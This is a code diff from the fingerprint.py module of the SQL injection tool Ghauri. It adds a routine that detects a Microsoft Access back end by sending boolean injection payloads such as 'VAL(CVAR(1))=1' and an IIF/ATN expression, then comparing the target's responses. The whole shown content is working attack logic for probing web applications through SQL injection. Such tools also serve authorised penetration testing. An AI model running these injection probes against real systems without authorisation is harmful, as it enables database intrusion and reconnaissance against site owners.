■ ■ ■ ■ ■ ■
ghauri/dbms/fingerprint.py
| skipped 212 lines |
213 | 213 | | _temp = "MySQL" |
214 | 214 | | return _temp |
215 | 215 | | |
| 216 | + | def check_access(self, heuristic_backend_check=False): |
| 217 | + | _temp = "" |
| 218 | + | if heuristic_backend_check: |
| 219 | + | attack = self.check_boolean_expression(expression="VAL(CVAR(1))=1") |
| 220 | + | attack01 = self.check_boolean_expression( |
| 221 | + | expression=quote( |
| 222 | + | "IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0", |
| 223 | + | ) |
| 224 | + | ) |
| 225 | + | bool_retval = check_boolean_responses( |
| 226 | + | self.base, |
| 227 | + | attack, |
| 228 | + | attack01, |
| 229 | + | match_string=self.match_string, |
| 230 | + | not_match_string=self.not_match_string, |
| 231 | + | code=self.code, |
| 232 | + | text_only=self.text_only, |
| 233 | + | ) |
| 234 | + | result = bool_retval.vulnerable |
| 235 | + | if result: |
| 236 | + | is_ok = False |
| 237 | + | if self._attacks: |
| 238 | + | t0, f0 = self._attacks[0].status_code, self._attacks[-1].status_code |
| 239 | + | t1, f1 = attack.status_code, attack01.status_code |
| 240 | + | r0, r1 = self._attacks[0].redirected, attack.redirected |
| 241 | + | is_ok = bool(t0 == t1 and f0 == f1 and r0 == r1) |
| 242 | + | if is_ok: |
| 243 | + | message = f"heuristic (extended) test shows that the back-end DBMS could be '{mc}Microsoft Access{nc}'" |
| 244 | + | logger.notice(message) |
| 245 | + | _temp = "Microsoft Access" |
| 246 | + | else: |
| 247 | + | logger.info(f"testing Microsoft Access") |
| 248 | + | attack = self.check_boolean_expression(expression="VAL(CVAR(1))=1") |
| 249 | + | bool_retval = check_boolean_responses( |
| 250 | + | self.base, |
| 251 | + | attack, |
| 252 | + | self.attack01, |
| 253 | + | match_string=self.match_string, |
| 254 | + | not_match_string=self.not_match_string, |
| 255 | + | code=self.code, |
| 256 | + | text_only=self.text_only, |
| 257 | + | ) |
| 258 | + | result = bool_retval.vulnerable |
| 259 | + | ok = False |
| 260 | + | if result: |
| 261 | + | logger.info(f"confirming Microsoft Access") |
| 262 | + | attack = self.check_boolean_expression( |
| 263 | + | expression="IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" |
| 264 | + | ) |
| 265 | + | bool_retval = check_boolean_responses( |
| 266 | + | self.base, |
| 267 | + | attack, |
| 268 | + | self.attack01, |
| 269 | + | match_string=self.match_string, |
| 270 | + | not_match_string=self.not_match_string, |
| 271 | + | code=self.code, |
| 272 | + | text_only=self.text_only, |
| 273 | + | ) |
| 274 | + | result = bool_retval.vulnerable |
| 275 | + | if not result: |
| 276 | + | warnMsg = "the back-end DBMS is not Microsoft Access" |
| 277 | + | logger.warning(warnMsg) |
| 278 | + | ok = False |
| 279 | + | return "" |
| 280 | + | if result: |
| 281 | + | ok = True |
| 282 | + | else: |
| 283 | + | warnMsg = "the back-end DBMS is not Microsoft Access" |
| 284 | + | logger.warning(warnMsg) |
| 285 | + | ok = False |
| 286 | + | return "" |
| 287 | + | if ok: |
| 288 | + | logger.notice("the back-end DBMS is Microsoft Access") |
| 289 | + | if ok: |
| 290 | + | _temp = "Microsoft Access" |
| 291 | + | return _temp |
| 292 | + | |
216 | 293 | | def check_mssql(self, heuristic_backend_check=False): |
217 | 294 | | _temp = "" |
218 | 295 | | db_version = "" |
| skipped 281 lines |